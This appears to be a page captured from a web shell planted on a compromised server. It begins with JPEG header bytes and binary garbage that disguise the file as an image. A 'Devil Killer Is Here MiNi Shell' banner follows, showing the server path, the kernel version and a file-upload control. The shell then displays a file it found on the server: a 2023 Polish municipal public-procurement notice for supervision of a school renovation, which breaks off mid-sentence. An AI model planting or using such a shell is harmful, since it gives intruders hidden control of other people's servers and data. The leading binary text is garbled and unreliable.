JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230602/0024426901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie nadzoru inwestorskiego nad realizacją zadania: „Termomodernizacja budynku Zespołu Szkolno-Przedszkolnego w Przyszowicach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GIERAŁTOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257848</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Księdza Roboty 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gierałtowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-186</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 30 11 340; 32 30 11 350</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@gieraltowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gieraltowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego nad realizacją zadania: „Termomodernizacja budynku Zespołu Szkolno-Przedszkolnego w Przyszowicach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5587b3c2-0059-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00244269</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00016834/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Pełnienie nadzoru inwestorskiego nad realizacją zadania: „Termomodernizacja budynku Zespołu Szkolno – Przedszkolnego w Przyszowicach”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gieraltowice.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gieraltowice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. .Ofertę, oświadczenia, podm. środki dowod,, pełnomocnictwa, zobow. podmiotu udost. zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozd. X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 2. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:3.1. drogą elektroniczną: zp@gieraltowice.pl; lub3.2. poprzez Platformę, dostępną pod adresem: https://gieraltowice.ezamawiajacy.pl3. Rejestracja na Platformie, w tym złożenie oferty w formie elektronicznej, wymaga: posiadania konta na Marketplanet OnePlace. 4. Rejestracja i korzystanie z Platformy. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gmina Gierałtowice, https://gieraltowice.ezamawiajacy.pl lub https.://oneplace.marketplanet.pl.5. Zgodnie z 67 ustawy Pzp., Zamawiający podaje wymagania techn. związane z korzystaniem z Platformy:6.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; a. Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;b. Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługującą TLS 1.2, ;c. Włączona obsługa JavaScript;d. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie.pdf. 6.2. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:a. dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdeS,b. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.6.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi do 2 GB. Zamawiający zaleca w szczególności następujące formaty przesyłanych danych: pdf, doc, docx, zip, 7z . Dopuszcza się następujące formaty przesyłanych danych: xml, txt, rtf, xps, odt, ods, odp, xls, ppt, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,tar, gz, gzip, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdeS, CAdeS, ASIC, XMLenc.6.4. Kodowanie określono w SWZ6.5. Zam. inf., iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platformy zakupowej Gminy Gierałtowice tel. +48 22 257 22 23)<br/>e-mail:oneplace@marketplanet.pl.6.6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Marketplanet OnePlace. Regulamin znajduje się na stronie: https://oneplace.marketplanet.pl/regulamin_ezamawiajacy.6. W korespondencji należy posługiwać się numerem postępowania. 7. Wyk. może zwrócić się do zam. o wyjaśnienie SWZ.Wniosek należy przesłać za pośrednictwem poczty elektronicznej e-mail: zp@gieraltowice.pl lub na Platformie Zakupowej: https://gieraltowice.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Na podstawie art. 19 ust. 1 ustawy Pzp., w związku z art. 13 ust. 1 - 3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja 2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1.1. Administratorem danych osobowych jest Wójt Gminy Gierałtowice z siedzibą <br/>w Gierałtowicach przy ul. Ks. Roboty 48, e-mail: urzadgminy@gieraltowice.pl;<br/>1.2.	Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@gieraltowice.pl lub pisemnie na adres siedziby Administratora;<br/>1.3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny sformalizowania procedur udzielania zamówień publicznych spoczywający <br/>na Zamawiającym; <br/>1.4. Odbiorcami danych osobowych jw. będą osoby lub podmioty, którym udostępniona zostanie <br/> dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września <br/> 2019 r.- Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późniejszymi zmianami), <br/> dalej „ustawa Pzp”; podmioty, którym na podstawie umowy powierzono przetwarzanie <br/> danych osobowych w tym spółka Otwarty Rynek Elektroniczny S.A z siedzibą w Warszawie <br/> (02-672) przy ul. Domaniewskiego 49, właściciel Platformy Zakupowej, na której Urząd <br/> prowadzi postępowanie o udzielenie zamówienia publicznego, działającą pod adresem: <br/> https://gieraltowice.ezamawiajacy.pl; <br/>1.5.	Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp. przez okres 4 lat <br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy ( art. 78 ust. 4 Pzp.);<br/>1.6.	Po spełnieniu celu, dla którego dane zostały zebrane, mogą one być przechowywane jedynie w celach archiwalnych, przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>1.7.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>1.8. W odniesieniu do udostępnionych danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>1.9. Osoba udostępniająca dane ma prawo:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ** ;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania <br/>o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO*** ;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>1.10.	Osobie udostępniającej dane osobowe nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP/10/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 60223,50 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad realizacją zadania: „Termomodernizacja budynku Zespołu Szkolno-Przedszkolnego w Przyszowicach”.<br/>2. Szczegółowy opis oraz sposób realizacji zamówienia zawiera Opis Przedmiotu Zamówienia (OPZ), stanowiący Załącznik nr 7 do SWZ.<br/>3. Postępowanie na roboty budowlane jest prowadzone w postępowaniu przetargowym nr: TP/7/2023, link do postępowania na roboty budowlane: https://gieraltowice.ezamawiajacy.pl/pn/gieraltowice/demand/notice/public/92532/details </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1.1. Cena (C) - waga kryterium 60 %;<br/>1.2. Doświadczenie inspektora nadzoru koordynatora (D)- waga kryterium 40 %.<br/><br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>2.1.	Cena (C) - waga 60%<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60%<br/> cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a. Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2.2.	Doświadczenie inspektora nadzoru koordynatora tj. Inspektora posiadającego uprawnienia konstrukcyjno - budowlane (D) - waga 40%<br/>2.2.1.	W kryterium „doświadczenie inspektora nadzoru koordynatora” oferta może uzyskać maksymalnie 40 punktów.<br/>2.2.2.	W ramach kryterium „doświadczenie inspektora nadzoru koordynatora” ocenie podlegać będzie ilość nadzorowanych (przez wskazanego inspektora, który będzie koordynatorem na przedmiotowym zadaniu) robót budowlanych na obiektach kubaturowych o wartości robót budowlanych minimum 2 500 000,00 zł brutto /każde, w okresie ostatnich 3 lat przed upływem terminu składania ofert, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie i przez wskazaną osobę. <br/>Dowodami potwierdzającymi należyte wykonanie usługi są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane. Jeżeli z dokumentów potwierdzających należyte wykonanie usługi nie wynika jednoznacznie, że usługę wykonywała osoba wskazana przez Wykonawcę na stanowisko inspektora nadzoru – koordynatora, to Wykonawca dodatkowo musi dołączyć inne dokumenty z których jednoznacznie będzie wynikało, że usługi były wykonane przez wskazaną osobę (np. referencje, kopia protokołu odbioru końcowego robót budowlanych, wyciąg z dziennika budowy, kopia zgłoszenia rozpoczęcia robót budowlanych wraz z oświadczeniem o podjęciu obowiązków inspektora nadzoru itp.). Osoba ta musi spełniać wymagania określone w rozdziale VIII niniejszej SWZ. <br/>Za każdą wykazaną oraz potwierdzoną dokumentami usługę nadzoru inwestorskiego polegającą na pełnieniu funkcji inspektora nadzoru nad robotami budowlanymi, na obiektach kubaturowych o wartości robót minimum 2 500 000,00zł brutto przez wskazanego przez Wykonawcę inspektora nadzoru Zamawiający przyzna 20 pkt. (1 zadanie – 20 pkt., 2 zadania - 40 pkt.). Maksymalna ilość punktowanych zadań to dwa zadania.<br/>2.2.3.	Wykonawca na potwierdzenie spełnienia kryterium – doświadczenie inspektora nadzoru koordynatora – składa wykaz doświadczenia inspektora nadzoru koordynatora (zał. nr 1 do formularza oferty/załącznik nr 10 do SWZ ) wraz z referencjami bądź innymi dokumentami z których jednoznacznie będzie wynikało, że usługa została wykonana należycie i była wykonana przez wskazanego inspektora nadzoru. <br/>2.2.4.	Maksymalna ilość punktowanych usług nadzoru inwestorskiego w powyższym kryterium wynosi 40 pkt.<br/>2.2.5.	W sytuacji:<br/>	nie złożenia wykazu,<br/>	nie złożenia dokumentów lub braku potwierdzenia w dokumentach wskazanych w pkt 2.2.2 potwierdzających realizację usługi przez osobę wskazaną do pełnienia funkcji inspektora nadzoru koordynatora ,<br/>	nie wskazania żadnego zadania spełniającego wymagania,<br/>	złożenia tylko swojego osobistego oświadczenia o pełnieniu funkcji inspektora nadzoru bez potwierdzenia tego dowodami,<br/>	nie wskazania imienia i nazwiska osoby proponowanej do pełnienia funkcji inspektora nadzoru w załączniku nr 10,<br/>oferta wykonawcy w ramach kryterium oceny ofert „Doświadczenie inspektora nadzoru koordynatora” otrzyma 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora nadzoru koordynatora (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1.	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4. zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że: <br/>2.4.1.	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, pełnił nadzór inwestorski nad realizacją przynajmniej dwóch zadań, obejmujących swoim zakresem roboty budowlane na obiektach kubaturowych o wartości robót budowlanych minimum 2 500 000,00 zł brutto /każde, - z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert. Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia. <br/>2.4.2.	Dysponuje lub dysponować będzie w trakcie realizacji zamówienia i skieruje do jego realizacji osoby, w szczególności odpowiedzialne za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami. Osobami wymaganymi przez Zamawiającego są:<br/>a.	inspektor nadzoru posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (inspektor koordynator),<br/>b.	inspektor nadzoru posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Osoby przewidziane do pełnienia samodzielnych funkcji 